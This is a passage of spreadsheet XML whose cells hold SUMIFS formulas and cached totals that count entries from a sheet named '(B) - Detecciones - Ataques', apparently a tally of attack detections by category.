      <c r="BF62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>9</v>
      </c>
      <c r="BG62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>2</v>
      </c>
      <c r="BJ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>24</v>
      </c>
      <c r="BL62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3620557</v>
      </c>
      <c r="BN62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1083807</v>
      </c>
      <c r="BO62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>13</v>
      </c>
      <c r="BT62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>271</v>
      </c>
      <c r="CA62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>5</v>
      </c>
      <c r="CG62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>6</v>
      </c>
      <c r="CI62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>34</v>
      </c>
      <c r="CJ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>19</v>
      </c>
      <c r="CL62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>171</v>
      </c>
      <c r="CN62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>17</v>
      </c>
      <c r="CP62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>46</v>
      </c>
      <c r="CQ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>18</v>
      </c>
      <c r="CY62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>64</v>
      </c>
      <c r="CZ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>12</v>
      </c>
      <c r="DF62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>479</v>
      </c>
      <c r="DI62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ62" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>19</v>
      </c>
      <c r="DK62" s="271"/>
      <c r="DO62" s="279"/>
      <c r="DP62" s="271"/>
      <c r="DQ62" s="271"/>
      <c r="DR62" s="271"/>
      <c r="DS62" s="271"/>
      <c r="DT62" s="271"/>
      <c r="DU62" s="271"/>
      <c r="DV62" s="271"/>
      <c r="DW62" s="271"/>
      <c r="DX62" s="271"/>
      <c r="DY62" s="271"/>
      <c r="DZ62" s="271"/>
      <c r="EA62" s="271"/>
      <c r="EB62" s="271"/>
      <c r="EC62" s="271"/>
      <c r="ED62" s="280"/>
      <c r="EG62" s="279"/>
      <c r="EH62" s="271"/>
      <c r="EI62" s="419" t="s">
        <v>558</v>
      </c>
      <c r="EJ62" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S39 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK62" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S39 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EL62" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S39 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="EM62" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI41,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S39 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="EN62" s="421">
        <f t="shared" si="37"/>
        <v>6</v>
      </c>
      <c r="EO62" s="271"/>
      <c r="EP62" s="456">
        <f t="shared" si="40"/>
        <v>0.125</v>
      </c>
      <c r="EQ62" s="457">
        <f t="shared" si="41"/>
        <v>0.875</v>
      </c>
      <c r="ER62" s="427">
        <f t="shared" si="42"/>
        <v>0.75</v>
      </c>
      <c r="ES62" s="427">
        <f t="shared" si="43"/>
        <v>0.6428571429</v>
      </c>
      <c r="ET62" s="427">
        <f t="shared" si="48"/>
        <v>0.5</v>
      </c>
      <c r="EU62" s="478"/>
      <c r="EV62" s="358" t="s">
        <v>292</v>
      </c>
      <c r="EW62" s="465">
        <f t="shared" ref="EW62:EZ62" si="56">IF(EJ40=0,"-",EJ61/EJ40)</f>
        <v>0</v>
      </c>
      <c r="EX62" s="465">
        <f t="shared" si="56"/>
        <v>0.125</v>
      </c>
      <c r="EY62" s="465">
        <f t="shared" si="56"/>
        <v>0.09090909091</v>
      </c>
      <c r="EZ62" s="466">
        <f t="shared" si="56"/>
        <v>0.06896551724</v>
      </c>
      <c r="FA62" s="479"/>
      <c r="FD62" s="480"/>
      <c r="FM62" s="480"/>
    </row>
    <row r="63">
      <c r="J63" s="277"/>
      <c r="K63" s="386" t="s">
        <v>2539</v>
      </c>
      <c r="L63" s="387" t="s">
        <v>2540</v>
      </c>
      <c r="M63" s="403" t="s">
        <v>2541</v>
      </c>
      <c r="N63" s="388" t="s">
        <v>2542</v>
      </c>
      <c r="O63" s="278"/>
      <c r="Q63" s="271"/>
      <c r="R63" s="352" t="s">
        <v>2529</v>
      </c>
      <c r="S63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>92</v>
      </c>
      <c r="T63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>921</v>
      </c>
      <c r="V63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>166</v>
      </c>
      <c r="W63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>52</v>
      </c>
      <c r="X63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>91873</v>
      </c>
      <c r="Y63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>990</v>
      </c>
      <c r="Z63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>5150049</v>
      </c>
      <c r="AA63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>751</v>
      </c>
      <c r="AB63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>495</v>
      </c>
      <c r="AC63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>195</v>
      </c>
      <c r="AD63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>59</v>
      </c>
      <c r="AE63" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>134</v>
      </c>
      <c r="AF63" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>1469</v>
      </c>
      <c r="AG63" s="271"/>
      <c r="AH63" s="352" t="s">
        <v>2529</v>
      </c>
      <c r="AI63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>51</v>
      </c>
      <c r="AJ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>3</v>
      </c>
      <c r="AK63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>37</v>
      </c>
      <c r="AL63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>505</v>
      </c>
      <c r="AR63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>263</v>
      </c>
      <c r="AS63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>58</v>
      </c>
      <c r="AU63" s="355">
